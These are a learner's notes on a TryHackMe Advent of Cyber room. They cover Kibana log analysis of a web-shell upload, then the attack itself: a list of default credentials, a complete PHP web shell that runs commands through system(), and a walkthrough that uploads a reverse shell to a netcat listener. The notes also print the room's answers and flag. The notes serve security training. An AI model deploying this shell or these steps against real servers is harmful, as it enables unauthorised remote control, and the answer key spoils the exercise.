THM: Advent of Cyber Day 3 Personal notes


The Story

Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: ”Two days! InsnowSec”.

With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
“To get to the conference, just follow the signs”.

Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website ?!?
He exploited it quick and made a report,
But before he could send arrived his transport.

In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn’t tell which,
The logs saved the day, it was the room of…the Glitch
In this task, we will gain access to the website.

Learning objectives

  • log analysis and tools like ELK
  • learn about KQL and how to use it to investigate logs in ELK
  • learn about RCE and how it is achieved via an insecure file upload

Connecting to the machine


Log analysis & Intro to ELK

Using ELK

  • we use Kibana to review the Apache2 logs
  • we go to Menu > Discover
  • we then change the index pattern to wareville-rails
  • we then set the start time to October 1 2024 00:00:00 and the end time to October 1 2024 23:30:00
  • in Kibana there are important parts to make note of
    • Search bar, used to search the logs with KQL queries
    • Index pattern, a collection of logs; it can come from a specific host or, for example, from multiple hosts with a similar purpose
    • Fields, shows the fields that Elasticsearch has parsed from the logs, e.g. timestamps, etc.
    • Timeline, a visualization of the event count over a period of time
    • Documents (Logs), the specific entries in the log file
    • Time filter, used to narrow down a specific time frame; alternatively a relative range can be used (Last 15 minutes, etc.)

Kibana Query Language (KQL)

  • easy to use
  • can be used to search documents for values
  • as an alternative, Kibana also allows the Lucene query syntax, which supports fuzzy terms, regexes, etc.


Query/syntax, description and example:

  • "" : two quote marks are used to search for a specific value within documents. Example: "TryHackMe"
  • * : denotes a wildcard; searches documents for similar matches to the value provided. Example: United*
  • OR : logical operator OR. Example: "UK" or "US"
  • AND : logical operator AND. Example: "Ben" and "10"
  • : : used to search a specific field of a document for a value, such as an IP address (note: this depends on the fields available in the index pattern). Example: ip.address: 10.10.10.10

Investigating a web attack with ELK

Scenario: thanks to extensive intrusion detection capabilities, our systems alerted the SOC team to a web shell being uploaded to the Wareville rails booking platform on Oct 1 2024. Our task is to review the webserver logs to determine how the attacker achieved this.

  • in the logs we see that shell.php was uploaded
  • we can find this quickly by browsing through the messages and spotting it manually
  • or we can filter with message: shell.php
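As an added illustration of the blue-team step above (not part of these notes or the TryHackMe room), the same check as the Kibana message filter done offline in Python over a few constructed Apache access-log lines: the 10.9.2.7 visitor, the timestamps and the response sizes are made up, while the shell path and the 10.11.83.34 address are the ones the room's logs show.

```python
import re
from collections import Counter

# Constructed Apache access-log lines modelled on the Wareville rails scenario.
# Timestamps, sizes and the 10.9.2.7 visitor are invented for this example.
SAMPLE_LOG = """\
10.9.2.7 - - [01/Oct/2024:10:04:11 +0000] "GET /rooms/ HTTP/1.1" 200 5120
10.11.83.34 - - [01/Oct/2024:10:06:48 +0000] "POST /admin/rooms/new HTTP/1.1" 302 0
10.11.83.34 - - [01/Oct/2024:10:07:02 +0000] "GET /media/images/rooms/shell.php?command=id HTTP/1.1" 200 96
10.9.2.7 - - [01/Oct/2024:10:07:30 +0000] "GET /media/images/rooms/room1.jpg HTTP/1.1" 200 8812
10.11.83.34 - - [01/Oct/2024:10:08:15 +0000] "GET /media/images/rooms/shell.php?command=whoami HTTP/1.1" 200 40
"""

# Common log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Directories that should only ever serve static uploads, never executable code.
UPLOAD_DIRS = ("/media/",)
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_script_in_upload_dir(path):
    """True when a request targets a server-side script under an upload-only directory."""
    clean = path.split("?", 1)[0].lower()
    return clean.startswith(UPLOAD_DIRS) and clean.endswith(SCRIPT_EXTS)


def find_web_shell_hits(log_text):
    """Return (set of script paths hit, Counter of source IPs that requested them).

    Roughly the KQL filter  message: *.php  narrowed to the upload path,
    but applied locally to raw log text instead of in Kibana."""
    shells, sources = set(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_script_in_upload_dir(rec["path"]):
            shells.add(rec["path"].split("?", 1)[0])
            sources[rec["ip"]] += 1
    return shells, sources


if __name__ == "__main__":
    paths, ips = find_web_shell_hits(SAMPLE_LOG)
    print("scripts requested under upload dir:", sorted(paths))
    print("requesting IPs:", ips.most_common())
```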

OPERATION RED

  • we look at how the attack itself was carried out (the red side)

Why do websites allow file uploads?

  • it's everywhere on websites, and for good reason
  • users often need to upload files like profile pictures, invoices, etc.
    • these make the UX smoother and more efficient
    • while convenient, it creates risk if file uploads aren't handled properly

File upload vulnerabilities

  • RCE, uploading a script that the server runs, which gives the attacker control over it
  • XSS, uploading an HTML file that contains XSS code which steals a cookie and sends it back to the attacker's server

Why unrestricted file uploads are dangerous

  • allow an attacker to upload any file type
  • if file contents aren't properly validated, an attacker could upload malicious scripts
  • examples
    • uploading a script that the server executes, leading to RCE
    • uploading a crafted image that triggers a vulnerability when processed by the server
    • uploading a web shell and browsing to it directly with a browser
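Added example, not from these notes or the room, serving the "File upload vulnerabilities" and "Why unrestricted file uploads are dangerous" sections: the weak behaviour (trusting the client's filename, so shell.php lands in the images directory as-is) next to a hardened store routine in Python. The image allowlist, the magic-byte table and the helper names are assumptions for illustration.

```python
import os
import secrets

# Image types a room-photo upload legitimately needs, with their magic bytes.
# An allowlist (rather than a denylist of .php) is the point: anything else is rejected.
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
# Extensions that must never appear anywhere in a stored name, nested or not.
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".html")


class UploadRejected(ValueError):
    pass


def unsafe_store_name(filename):
    """Weak behaviour: trust the client's filename, so shell.php is saved as shell.php
    and can then be browsed to directly and executed by the server."""
    return os.path.basename(filename)


def safe_store_name(filename, content):
    """Hardened behaviour: allowlist the extension, refuse nested script extensions
    such as photo.php.jpg, confirm the magic bytes match the declared type, and
    store under a server-chosen random name rather than the client's."""
    lowered = os.path.basename(filename).lower()
    ext = os.path.splitext(lowered)[1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    nested = ["." + part for part in lowered.split(".")[1:-1]]
    if any(part in SCRIPT_EXTS for part in nested):
        raise UploadRejected("nested script extension in filename")
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared image type")
    # Random name: the uploader cannot predict the stored path, and the stored
    # extension is the validated one, not whatever the client sent.
    return secrets.token_hex(16) + ext


def is_accepted(filename, content):
    """Yes/no wrapper around safe_store_name for quick checks."""
    try:
        safe_store_name(filename, content)
        return True
    except UploadRejected:
        return False
```

Whatever the validation does, the upload directory itself should also be served with server-side script execution disabled, so a file that slips through is returned as bytes rather than run.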

Usage of weak credentials

  • the easiest way for attackers to break into systems is through weak or default creds
  • these can be an open door for attackers to gain unauthorized access
  • default creds are often found in systems where administrators fail to change the initial login details provided during setup
  • common weak creds
    • admin/admin
    • administrator/administrator
    • admin@domainname/admin
    • guest/guest

RCE

WebShell

Exploiting RCE via File upload

Below is an example PHP file that exploits a theoretical vulnerability:

<html>
<body>
  <!-- The form submits the typed command back to this same script via GET -->
  <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="text" name="command" autofocus id="command" size="50">
    <input type="submit" value="Execute">
  </form>
  <pre>
<?php
// If a command was supplied, run it on the host and echo its stdout and stderr
if(isset($_GET['command']))
{
    system($_GET['command'] . ' 2>&1');
}
?>
  </pre>
</body>
</html>

The script above, when accessed, displays an input field; whatever is entered is run against the underlying operating system using PHP's system() function.

Practical

work on frostypines.thm

Question and Answers:

  1. BLUE: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php
    1. /media/images/rooms/shell.php
  2. BLUE: What IP address accessed the web shell?
    1. 10.11.83.34
  3. What is the contents of the flag.txt?
    1. to get the answer we attempted to use common admin passwords in the admin@domain/admin format
    2. we tried using /shell.php but it seems it doesn't work; I saw a video where it worked
    3. it didn't work, so I had to find a different way
    4. I tried to log in and upload my own shell, which I got from pentestmonkey, with the IP and port modified to point to my waiting nc -lvnp 4444
    5. then I had to call /media/images/rooms/myshell.php so that it connects to my waiting netcat listener
    6. after it triggered, it gave me the shell I needed
    7. flag was
      1. THM{Gl1tch_Was_H3r3}
